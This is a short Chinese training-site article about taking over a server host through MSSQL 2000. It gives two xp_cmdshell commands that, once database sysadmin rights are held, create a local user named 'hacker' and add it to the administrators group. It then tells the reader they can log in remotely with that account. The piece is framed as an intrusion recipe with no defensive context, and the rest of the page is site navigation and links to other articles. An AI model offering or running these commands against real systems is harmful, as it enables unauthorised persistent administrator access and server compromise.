软件开发培训班 >> 网络技术 >> 网络安全

通过MSSQL 2000 入侵服务器主机器的命令

　　本文标签：MSSQL,入侵服务器

首先确保得到数据库超级管理员权限

然后执行如下SQL命令:

1、exec master.dbo.xp_cmdshell net user hacker hacker /add
2、exec master.dbo.xp_cmdshell net localgroup administrators hacker /add

解释：

1.通过调用cmdshell 也就是cmd 执行DOS 命令创建hacker用户

2 授权给hacker用户超级管理员权限..

3 这时候您就可以使用创建的帐户去远程登陆这台主机了

技术文章快速查找

HTML5安全风险详析之六：API攻击

微软：弃用被病毒当作攻击目标的脚本

信息安全之防火墙评测:软件

阿江统计系统V1.6后台拿SHELL的方法

OpenBSD处理畸形的IPv6数据多个远程拒绝服务漏洞

使用参数化查询防止SQL注入漏洞

CheckPoint SP-5500防火墙评测

网站防护新模式——把“保镖”换成“替身”

在线教程导航

软件应用
·Windows8	·Windows7	·Word
·Excel	·PPT	·WPS
Web开发
·ASP	·JavaScript	·DIV+CSS
·JSP	·VbScript	·XML
·PHP
开发语言
·VB	·VC	·ASP.NET
·Java	·C++	·Delphi
数据库开发
·MySQL	·MsSQL	·Access
·Oracle	·DB2
手机系统
·Android	·iOS	·WindowsPhone
网站设计
·Flash	·Dreamweaver	·Fireworks
平面设计
·Photoshop	·CorelDraw	·AutoCAD
·3DsMAX	·Illustrator
网络技术
·网站运营	·网络安全	·网络搭建